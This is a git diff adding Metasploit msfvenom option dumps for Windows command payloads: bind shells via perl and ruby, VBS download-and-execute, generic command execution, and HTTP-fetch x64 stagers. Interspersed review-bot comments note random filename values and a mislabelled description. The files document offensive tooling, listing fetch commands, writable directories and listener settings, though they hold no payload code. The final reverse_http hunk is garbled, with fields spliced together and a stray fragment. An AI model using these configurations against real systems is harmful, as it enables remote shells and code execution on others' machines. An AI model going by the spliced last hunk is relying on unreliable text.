@@ -0,0 +1,34 @@ + + Name: Windows Command Shell, Bind TCP (via perl) IPv6 + Module: payload/cmd/windows/bind_perl_ipv6 + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 140 + Rank: Normal + +Provided by: + Samy + cazz + aushack + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via perl (persistent) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PerlPath perl yes The path to the Perl executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-bind_ruby.txt b/msfvenom/payload_options/cmd-windows-bind_ruby.txt new file mode 100644 index 0000000..fe13d44 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-bind_ruby.txt 
@@ -0,0 +1,32 @@ + + Name: Windows Command Shell, Bind TCP (via Ruby) + Module: payload/cmd/windows/bind_ruby + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 128 + Rank: Normal + +Provided by: + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Continually listen for a connection and spawn a command shell via Ruby + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + RubyPath ruby yes The path to the Ruby executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-download_eval_vbs.txt b/msfvenom/payload_options/cmd-windows-download_eval_vbs.txt new file mode 100644 index 0000000..2555076 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-download_eval_vbs.txt 
@@ -0,0 +1,34 @@ + + Name: Windows Executable Download and Evaluate VBS + Module: payload/cmd/windows/download_eval_vbs + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 126 + Rank: Normal + +Provided by: + scriptjunkie + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +DELETE false yes Delete created .vbs after download +INCLUDECMD false yes Include the cmd /q /c +INCLUDEWSCRIPT false yes Include the wscript command +URL yes The pre-encoded URL to the script + +Description: + Downloads a file from an HTTP(S) URL and executes it as a vbs script. + Use it to stage a vbs encoded payload from a short command line. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-download_exec_vbs.txt b/msfvenom/payload_options/cmd-windows-download_exec_vbs.txt new file mode 100644 index 0000000..9846fdb --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-download_exec_vbs.txt 
@@ -0,0 +1,33 @@ + + Name: Windows Executable Download and Execute (via .vbs) + Module: payload/cmd/windows/download_exec_vbs + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 315 + Rank: Normal + +Provided by: + scriptjunkie + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +DELETE true yes Delete created .vbs after download +EXT exe yes The extension to give the saved file +INCLUDECMD false yes Include the cmd /q /c +URL yes The pre-encoded URL to the executable + +Description: + Download an EXE from an HTTP(S) URL and execute it + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-generic.txt b/msfvenom/payload_options/cmd-windows-generic.txt new file mode 100644 index 0000000..aabc922 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-generic.txt 
@@ -0,0 +1,30 @@ + + Name: Windows Command, Generic Command Execution + Module: payload/cmd/windows/generic + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute + +Description: + Executes the supplied command + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_ipv6_tcp.txt new file mode 100644 index 0000000..038d3bb --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_ipv6_tcp.txt 
@@ -0,0 +1,76 @@ + + Name: HTTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager + Module: payload/cmd/windows/http/x64/custom/bind_ipv6_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 129 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME BoBBvvomkrO no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. + + Listen for an IPv6 connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. 
+ EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
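Review bot: The FETCH_FILENAME "Current Setting" in this cmd-windows-http-x64-custom-bind_ipv6_tcp.txt hunk (`BoBBvvomkrO`) is a fresh random string on every msfvenom run, so each regeneration of these files will produce spurious one-line diffs across the whole cmd/windows/http family; the following bind_ipv6_tcp_uuid, bind_named_pipe, bind_tcp and bind_tcp_rc4 hunks already show this with `SUQmikdjmM`, `ajFBcdvHADDU`, `ZaHBoQkpto` and `WhOFFnYbbG`. Have the generator normalise that column to a fixed placeholder such as `<random>` before writing the file, or state in the README that the value is per-run and not a stable default.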
diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_ipv6_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_ipv6_tcp_uuid.txt new file mode 100644 index 0000000..a8c7b9b --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_ipv6_tcp_uuid.txt 
@@ -0,0 +1,77 @@ + + Name: HTTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support + Module: payload/cmd/windows/http/x64/custom/bind_ipv6_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME SUQmikdjmM no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. 
+ + Listen for an IPv6 connection with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn 
and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_named_pipe.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_named_pipe.txt new file mode 100644 index 0000000..2660f29 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_named_pipe.txt 
@@ -0,0 +1,82 @@ + + Name: HTTP Fetch, Windows shellcode stage, Windows x64 Bind Named Pipe Stager + Module: payload/cmd/windows/http/x64/custom/bind_named_pipe + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 131 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + UserExistsError + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME ajFBcdvHADDU no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 445 yes SMB port +PIPENAME msf-pipe yes Name of the pipe to connect to +RHOST no Host of the pipe to connect to +SHELLCODE_FILE no Shellcode bin to launch +SMBDomain . no The Windows domain to use for authentication +SMBPass no The password for the specified username +SMBUser no The username to authenticate as + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. 
+ + Listen for a pipe connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in 
+ SMBDirect true yes The target port is a raw SMB service (not NetBIOS) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WAIT_TIMEOUT 10 no Seconds pipe will wait for a connection + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_tcp.txt new file mode 100644 index 0000000..0139d7d --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_tcp.txt 
@@ -0,0 +1,76 @@ + + Name: HTTP Fetch, Windows shellcode stage, Windows x64 Bind TCP Stager + Module: payload/cmd/windows/http/x64/custom/bind_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME ZaHBoQkpto no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. + + Listen for a connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. 
+ EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
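Review bot: Description text in this region is inconsistent with the module names: the cmd-windows-http-x64-custom-bind_tcp.txt hunk correctly says "Listen for a connection (Windows x64)", but the bind_tcp_rc4 hunk that follows describes the same bind-style module (`payload/cmd/windows/http/x64/custom/bind_tcp_rc4`, with LPORT and RHOST rows) as "Connect back to the attacker". Since the dumps are captured verbatim, the fix is an upstream report against the module's description string plus a README note, so readers of this directory do not take the RC4 variant for a reverse-connect payload.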
diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_tcp_rc4.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_tcp_rc4.txt new file mode 100644 index 0000000..c4958e3 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_tcp_rc4.txt 
@@ -0,0 +1,82 @@ + + Name: HTTP Fetch, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm) + Module: payload/cmd/windows/http/x64/custom/bind_tcp_rc4 + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + hdm + skape + sf + mihi + max3raza + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME WhOFFnYbbG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RC4PASSWORD msf yes Password to derive RC4 key from +RHOST no The target address +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. 
+ + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + 
StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_tcp_uuid.txt new file mode 100644 index 0000000..1da0229 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_tcp_uuid.txt 
@@ -0,0 +1,77 @@ + + Name: HTTP Fetch, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64) + Module: payload/cmd/windows/http/x64/custom/bind_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME chjwYLJXHh no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. 
+ + Listen for a connection with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run 
shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_http.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_http.txt new file mode 100644 index 0000000..7ea3fe3 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_http.txt 
@@ -0,0 +1,97 @@ + + Name: HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet) + Module: payload/cmd/windows/http/x64/custom/reverse_http + Platform: Windows + Arch: +Evasion options for payload/cmd/windows/http/x64/custom/reverse_http: +========================= + +atters-r7 + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME jUNLIDtlirT no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. 
+ + Tunnel communication over HTTP (Windows x64 wininet) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

